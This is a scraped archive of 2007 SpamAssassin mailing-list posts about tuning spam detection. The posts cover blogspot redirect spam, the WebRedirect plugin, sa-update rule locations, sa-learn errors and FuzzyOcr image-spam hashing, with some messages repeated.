Ok, I've got one; apparently from a gmail user to my gmail account, then 
forwarded to an external account.   The html links go to a blogspot.com 
site, then redirect to some Pharmacy Express site.


Raw Message: http://bubba.org/spam/spam_lowscore.txt
Message renders like this: http://bubba.org/spam/spam_lowscore.jpg

X-Spam-Status: No, score=-0.5 required=4.5 tests=BAYES_50,HTML_MESSAGE,
SPF_PASS autolearn=no version=3.1.8
X-Spam-Report:
* -0.5 SPF_PASS SPF: sender matches SPF record
*  0.0 HTML_MESSAGE BODY: HTML included in message
*  0.0 BAYES_50 BODY: Bayesian spam probability is 40 to 60%
*  [score: 0.4641]

Any ideas for detecting these?


The WebRedirect plugin will help (if you add *.blogspot.com to the list of 
domains it's supposed to check).


Daryl




I installed the plugin, added *.blogspot.com to the list, and the plugin 
didn't flag anything for this particular message.


[13718] dbg: plugin: Mail::SpamAssassin::Plugin::WebRedirect=HASH(0x8f54e7c) implements 
'parsed_metadata'

[13718] dbg: uri: html uri found, http://osmmehaaranrev.blogspot.com/
[13718] dbg: uri: cleaned html uri, http://osmmehaaranrev.blogspot.com/
[13718] dbg: uri: html domain, blogspot.com
[13718] dbg: uri: parsed uri found, http://osmmehaaranrev.blogspot.com/
[13718] dbg: uri: parsed domain, blogspot.com
[13718] dbg: uridnsbl: domain blogspot.com in skip list
[13718] dbg: uridnsbl: domains to query:
[13718] dbg: rules: hostname: osmmehaaranrev.blogspot.com matches check 
pattern: *.blogspot.com
[13718] dbg: rules: checking uri: http://osmmehaaranrev.blogspot.com/
[13718] dbg: rules: request status: 200 OK
[13718] dbg: rules: got response to request in 0.813493 seconds
[13718] dbg: rules: _decode_page() iteration 0
[13718] dbg: rules: WebRedirect page text: start>>

[13718] dbg: rules: WebRedirect decoded text: start>><

Low Scoring Message



Ok, I've got one; apparently from a gmail user to my gmail account, then 
forwarded from my gmail account to an external account.   The html links 
go to a blogspot.com site, then redirect to some Pharmacy Express site.


Raw Message: http://bubba.org/spam/spam_lowscore.txt
Message renders like this: http://bubba.org/spam/spam_lowscore.jpg

X-Spam-Status: No, score=-0.5 required=4.5 tests=BAYES_50,HTML_MESSAGE,
SPF_PASS autolearn=no version=3.1.8
X-Spam-Report:
* -0.5 SPF_PASS SPF: sender matches SPF record
*  0.0 HTML_MESSAGE BODY: HTML included in message
*  0.0 BAYES_50 BODY: Bayesian spam probability is 40 to 60%
*  [score: 0.4641]

Any ideas for detecting these?
-B

Re: Low Scoring Message

2007-03-13 Thread Brian Wilson



Ok, I've got one; apparently from a gmail user to my gmail account,  
then forwarded to an external account.   The html links go to a  
blogspot.com site, then redirect to some Pharmacy Express site.


Raw Message: http://bubba.org/spam/spam_lowscore.txt
Message renders like this: http://bubba.org/spam/spam_lowscore.jpg

X-Spam-Status: No, score=-0.5 required=4.5 tests=BAYES_50,HTML_MESSAGE,
SPF_PASS autolearn=no version=3.1.8
X-Spam-Report:
* -0.5 SPF_PASS SPF: sender matches SPF record
*  0.0 HTML_MESSAGE BODY: HTML included in message
*  0.0 BAYES_50 BODY: Bayesian spam probability is 40 to 60%
*  [score: 0.4641]

Any ideas for detecting these?
-B

Re: Sorting SA Discussion List Messages

2007-03-03 Thread Brian Wilson



On Mar 3, 2007, at 4:41 PM, Mário Gamito wrote:


Don Ireland wrote:
Every email list I've ever subscribed to has had something in the  
subject line (usually in square brackets) to identify 1) that it  
is a mailing list and 2) what list it is.
Maybe, just maybe, you can filter through e-mail adresseses instead  
of subjects.


-- Mário Gamito


This works until someone's reply to your posting is sent directly to  
you instead of to the mailing list.  In order for the reply to be  
threaded properly with other messages in the thread, it needs to be  
put into the same folder.  An easy way to direct it to a folder is  
basing your rules off some characteristic that message  it originally  
had (i.e. the subject).  I tend to agree that it would be nice if the  
mailing list had a subject prefix like most other mailing lists.  If  
not to sort mail, at least to be able to categorize it mentally  
should you not classify your mail into folders.


-B

Re: Using sa-learn and fetchmail

2007-02-27 Thread Brian Wilson



On Feb 27, 2007, at 5:59 AM, Matthew Bickerton wrote:


Hi all,

As described in the SA wiki, I have set up fetchmail to read a mail  
folder

in to sa-learn. However I get the following error:

/usr/local/bin/fetchmail -a -s -n --uidl --keep --folder  
LearnAsSpam -m

'/usr/local/bin/sa-learn --spam'
archive-iterator: invalid (undef) format in target list, 2 at
/usr/local/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/ 
ArchiveIterator.pm

line 724,  line 1.
Learned tokens from 0 message(s) (1 message(s) examined)




If I try reading the mail box directly with :


/usr/local/bin/sa-learn --spam --mbox $HOME/mail/LearnAsSpam

Learned tokens from 0 message(s) (2 message(s) examined)




It works fine.

I am using SpamAssassin version 3.1.8. Has anybody a suggestion?

Thanks

Matthew



Bug and proposed patch here:  https://issues.apache.org/SpamAssassin/ 
show_bug.cgi?id=5336


The patch works fine for me.

-B

Re: how to start using sa-update

2007-02-25 Thread Brian Wilson



On Feb 25, 2007, at 3:24 PM, John Fleming wrote:



- Original Message - From: "David Goldsmith"  
<[EMAIL PROTECTED]>

To: "Bram Mertens" <[EMAIL PROTECTED]>
Cc: 
Sent: Sunday, February 25, 2007 2:10 PM
Subject: Re: how to start using sa-update



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Bram Mertens wrote:


Hi

I unsubscribed from this list decembre 2004 since SA was working  
fine for

me and I couldn't keep up with the volume on this list.

Lately however the number of SPAM messages getting through is  
increasing

rapidly so I could use some help.

Currently I'm running SpamAssassin version 3.1.7-deb ( running on  
Perl
version 5.8.8) on Debian Etch.  Without RDJ or any other tool to  
update my

rules.

While checking the archives and the wiki I learned of the new sa- 
update
tool and it appears to be very interesting.  Unfortunately I  
(apparantely
like several others) am strugling to understand where to put the  
various

rules.

Right now I have:
* the SA "default" rules - meaning the rules distributed by SA in
/usr/share/spamassassin
* Some of the SARE rules and a rule I wrote myself in /etc/ 
spamassassin


Sa-update will create a /var/lib/spamassassin/3. folder  
containg the

various rules downloaded from the various channels.

What I don't understand (and I have read quite a few messages  
about this
topic in the archives) is whether this new directory replaces one  
of the
above or not.  Put differently: will the (currently outdated)  
rules in
/etc/spamassassin and my own rule in that same directory still be  
used or
should I move the ones I still need to some other directory?  If  
so which

one?

Thanks in advance

Bram



SA 3.1.x will look for rules in /usr/share/spamassassin,
/var/lib/spamassassin and /etc/mail/spamassassin.  The last  
definition

of any rule wins.

So your default version of the core rules are in /usr/share/ 
spamassassin

and if you use sa-update, then you will have newer versions of these
rules under /var/lib/spamassassin/3.xx/updates_spamassassin_org*

If you use sa-update to download the SARE rulesets (one source is
http://saupdates.openprotect.com/), then you would also have
/var/lib/spamassassin/3.xx/saupdates_openprotect_org* with the
latest SARE rules.

If you do this, you can delete any SARE rulesets from you
/etc/mail/spamassassin directory (70_sare_*, 99_sare_*)

Any local rulesets you create, or modifications to core/SARE rules,
should go in files in /etc/mail/spamassassin.

David Goldsmith
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3rc2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFF4d81417vU8/9QfkRAqMpAJ45f9Zvjjp/vqLejMDrTyefwONV6gCfZVnL
7dAeChXChrRcIkQJPct6Xck=
=PJKZ
-END PGP SIGNATURE-



Thanks for the Q&A!  Now, is there any functional difference  
between using sa-update in this way and using RDJ to get the SARE  
rules?  (I'm using RDJ right now, so what would I gain by changing  
to sa-update with a SARE channel?  Thanks!  - John





Yes, use Daryl's SARE update channels (http://daryl.dostech.ca/sa- 
update/sare/sare-sa-update-howto.txt).  RDJ is old and busted.   If  
Daryl would add KAM.cf I'd be in business *hint hint* :)


-B

Re: Crooked JPG's not being recognized by FuzzyOCR?

2007-02-25 Thread Brian Wilson



On Feb 25, 2007, at 2:29 PM, David Goldsmith wrote:


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Ok, I had a permissions issue on some of the FuzzyOCR files so it
couldn't properly parse it.  Now that the permissions are fixed, my
system is catching that image.

SA results are:

X-Spam-Report:
* -1.4 ALL_TRUSTED Passed through trusted hosts only via SMTP
*  5.0 FUZZY_OCR BODY: Mail contains an image with common spam
   text inside
*  Words found:
"target" in 1 lines
"target" in 1 lines
(2 word
*  occurrences found)
* -1.9 AWL AWL: From: address is in the auto white-list

FuzzyOCR flagged it, it just didn't get blocked since it was from  
me to
me and only went through internal servers, there were some negative  
offsets.




I have received the same spam message (my copy: http://bubba.org/spam/ 
imagespam13.txt) and FuzzyOcr seems to pick it up fine, but it would  
have still been flagged as spam with other checks.


[12518] info: FuzzyOcr: Scanset "ocrad" found word "target" with fuzz  
of 0.

[12518] info: FuzzyOcr: line: " target kt ss"
[12518] info: FuzzyOcr: Scanset "ocrad" found word "company" with  
fuzz of 0.1429
[12518] info: FuzzyOcr: line: "companrirwin resources inc c oder otc  
i w r s p k "
[12518] dbg: FuzzyOcr: Not enough OCR Hits without space stripping,  
doing second matching pass...
[12518] info: FuzzyOcr: Scanset "ocrad" found word "target" with fuzz  
of 0.

[12518] info: FuzzyOcr: line: "targetktss"
[12518] info: FuzzyOcr: Scanset "ocrad" found word "company" with  
fuzz of 0.1429

[12518] info: FuzzyOcr: line: "companrirwinresourcesinccoderotciwrspk"
[12518] info: FuzzyOcr: Scanset "ocrad" generates enough hits (4),  
skipping further scansets...


*  6.0 FUZZY_OCR BODY: Mail contains an image with common  
spam text inside

*  Words found:
"target" in 1 lines
"company" in 1 lines
"target" in 1
*  lines
"company" in 1 lines

-B

Re: FuzzyOcr - how do I "teach" it?

2007-02-24 Thread Brian Wilson



On Feb 20, 2007, at 6:36 PM, Robert S wrote:


I have just installed FOCR 3.5.1 with the hashdb option.  I have been
receiving image spams about China Fruits Corporation which are
cleverly designed not to contain words in the words list.  How do I
insert the hash into the database and label this image as spam?

I have tried - unsuccessfully:

fuzzy-find --score=10 --learn-spam --verbose
"367563:437:282:32::49:1:18:17:55642::44:40:7:37:54950::218:144:172:16 
9:1131::96:99:179:107:1094::100:122:122:115:1093::156:136:162:145:1066 
"

(I got the hash score from running "spamassassin -D < message")

and

fuzzy-find  --score=10 --learn-spam 'notary_public.gif'

I'd like to avoid tampering with the words list to avoid FPs.

Could somebody please tell me where I'm going wrong.

It would be nice if images could be automatically stored in the hashdb
as spam if SA gives them a positive score, but FOCR does not.


I have the same problem as you, so you are not alone.  I first  
deleted the hash using fuzzy-find to make sure it didn't exist in  
either hash, then added it with a score of 10.  I re-ran spamassassin  
with debug on for FuzzyOcr and it did not see the entry in the spam  
db.  I even compared the hashes and they were the same:


% fuzzy-find --delete  
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:24 
9:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68: 
410

Img =278502 292x319x128

% fuzzy-find --learn-spam  
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:24 
9:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68: 
410

Img =278502 292x319x128

Rerun the spam  through SA (China Fruits also: http://bubba.org/spam/)

Adding key to database...
[1548] dbg: FuzzyOcr: Not enough OCR Hits without space stripping,  
doing second matching pass...

[1548] info: FuzzyOcr: Message is ham, saving...
[1548] info: FuzzyOcr: Adding Hash to "/etc/mail/spamassassin/ 
FuzzyOcr.safe.db" with score "0"
[1548] dbg: FuzzyOcr: Digest:  
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:24 
9:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68: 
410

RE: FuzzyOcr image spam not getting scored


On Fri, 23 Feb 2007, Randal, Phil wrote:


Charming!

Being part of a large community on this mailing list, my answer was
addressing all readers and not just you.

So I included the extra info for those readers who scanned your email
and found low SA scores regardless.

What FuzzyOCR scanset did you use to catch those?

And which version of netpbm are you using?

Cheers,

Phil



I'm sure I confused lots of readers; those are obviously not the ones that 
would be of much assistance anyway. c'est la vie.


I'm running netpbm 10.35, tesseract 1.03, ocrad 0.16, gocr 0.43

[14276] info: FuzzyOcr: Scanset "ocrad" found word "stock" with fuzz of 0.2000
[14276] info: FuzzyOcr: Scanset "ocrad" found word "stock" with fuzz of 0.2000
[14276] info: FuzzyOcr: Scanset "gocr" found word "stock" with fuzz of 0.2000
[14276] info: FuzzyOcr: Scanset "gocr" found word "investor" with fuzz of 0.2500
[14276] info: FuzzyOcr: Scanset "gocr" found word "company" with fuzz of 0.2857
[14276] info: FuzzyOcr: Words found:
[14276] info: FuzzyOcr: (4.5 word occurrences found)

Reading another post about FPs with a threshold as high as .30, I have 
bumped it down to .25 and modified the wordlist on longer words that could 
benefit from a higher threshold.


-B

RE: FuzzyOcr image spam not getting scored


On Fri, 23 Feb 2007, Randal, Phil wrote:


I caught these by adding

corpo

to my FuzzyOCR.words file.

But you should also br running a bunch of SARE rules, and sa-updated
rulesets.



Wow, thanks for not reading my email or reading the scores in the message 
I posted.  As I originally noted, the message was tagged already tagged as 
spam.


Also, big big thanks to snowcrash who actually helped me turn my 0 score 
to:


[12921] info: FuzzyOcr: Message is spam, score = 6.500
[12921] info: FuzzyOcr: Words found:
[12921] info: FuzzyOcr: "stock" in 1 lines
[12921] info: FuzzyOcr: "investor" in 1 lines
[12921] info: FuzzyOcr: "company" in 1 lines
[12921] info: FuzzyOcr: "alert" in 1 lines
[12921] info: FuzzyOcr: (6 word occurrences found)

Simply changing focr_threshold from 0.25 to 0.30 allowed this to happen.

Thanks again, snowcrash!

-B

Re: Fwd: FuzzyOcr - how do I "teach" it?

On Fri, 23 Feb 2007, Jorge Valdes wrote:

Brian Wilson wrote:

On Feb 20, 2007, at 6:36 PM, Robert S wrote:

I have just installed FOCR 3.5.1 with the hashdb option. I have been
receiving image spams about China Fruits Corporation which are
cleverly designed not to contain words in the words list. How do I
insert the hash into the database and label this image as spam?

I have tried - unsuccessfully:

fuzzy-find --score=10 --learn-spam --verbose
"367563:437:282:32::49:1:18:17:55642::44:40:7:37:54950::218:144:172:169:1131::96:99:179:107:1094::100:122:122:115:1093::156:136:162:145:1066"
(I got the hash score from running "spamassassin -D < message")

and

fuzzy-find --score=10 --learn-spam 'notary_public.gif'

I'd like to avoid tampering with the words list to avoid FPs.

Could somebody please tell me where I'm going wrong.

It would be nice if images could be automatically stored in the hashdb
as spam if SA gives them a positive score, but FOCR does not.

I have the same problem as you, so you are not alone. I first deleted the
hash using fuzzy-find to make sure it didn't exist in either hash, then
added it with a score of 10. I re-ran spamassassin with debug on for
FuzzyOcr and it did not see the entry in the spam db. I even compared the
hashes and they were the same:

% fuzzy-find --delete
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410
Img =278502 292x319x128

% fuzzy-find --learn-spam --score=10
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410
Img =278502 292x319x128

Rerun the spam through SA (China Fruits also: http://bubba.org/spam/)

Adding key to database...
[1548] dbg: FuzzyOcr: Not enough OCR Hits without space stripping, doing
second matching pass...

[1548] info: FuzzyOcr: Message is ham, saving...
[1548] info: FuzzyOcr: Adding Hash to
"/etc/mail/spamassassin/FuzzyOcr.safe.db" with score "0"
[1548] dbg: FuzzyOcr: Digest:
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410

Remember that in order for things to work right, the safe database is checked
first. The rationale behind this is that if an image "fingerprint" is found
here, there is no need to do OCR. If you already have the image learned as
HAM, you must delete it first, then optionally add it to the SPAM database.

Jorge.

Is that not what I did? It's obvious to me that since it was learned as
ham, it must be deleted before being reclassified as spam (which I did).
Then I re-ran spamassassin and it was again tagged as ham, which it
shouldn't be since I removed it from ham and reclassified it as spam.

Fwd: FuzzyOcr - how do I "teach" it?


On Feb 20, 2007, at 6:36 PM, Robert S wrote:


I have just installed FOCR 3.5.1 with the hashdb option.  I have been
receiving image spams about China Fruits Corporation which are
cleverly designed not to contain words in the words list.  How do I
insert the hash into the database and label this image as spam?

I have tried - unsuccessfully:

fuzzy-find --score=10 --learn-spam --verbose
"367563:437:282:32::49:1:18:17:55642::44:40:7:37:54950::218:144:172:16 
9:1131::96:99:179:107:1094::100:122:122:115:1093::156:136:162:145:1066 
"

(I got the hash score from running "spamassassin -D < message")

and

fuzzy-find  --score=10 --learn-spam 'notary_public.gif'

I'd like to avoid tampering with the words list to avoid FPs.

Could somebody please tell me where I'm going wrong.

It would be nice if images could be automatically stored in the hashdb
as spam if SA gives them a positive score, but FOCR does not.



I have the same problem as you, so you are not alone.  I first  
deleted the hash using fuzzy-find to make sure it didn't exist in  
either hash, then added it with a score of 10.  I re-ran spamassassin  
with debug on for FuzzyOcr and it did not see the entry in the spam  
db.  I even compared the hashes and they were the same:


% fuzzy-find --delete  
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:24 
9:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68: 
410

Img =278502 292x319x128

% fuzzy-find --learn-spam --score=10  
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:24 
9:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68: 
410

Img =278502 292x319x128

Rerun the spam  through SA (China Fruits also: http://bubba.org/spam/)

Adding key to database...
[1548] dbg: FuzzyOcr: Not enough OCR Hits without space stripping,  
doing second matching pass...

[1548] info: FuzzyOcr: Message is ham, saving...
[1548] info: FuzzyOcr: Adding Hash to "/etc/mail/spamassassin/ 
FuzzyOcr.safe.db" with score "0"
[1548] dbg: FuzzyOcr: Digest:  
278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:24 
9:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68: 
410

FuzzyOcr image spam not getting scored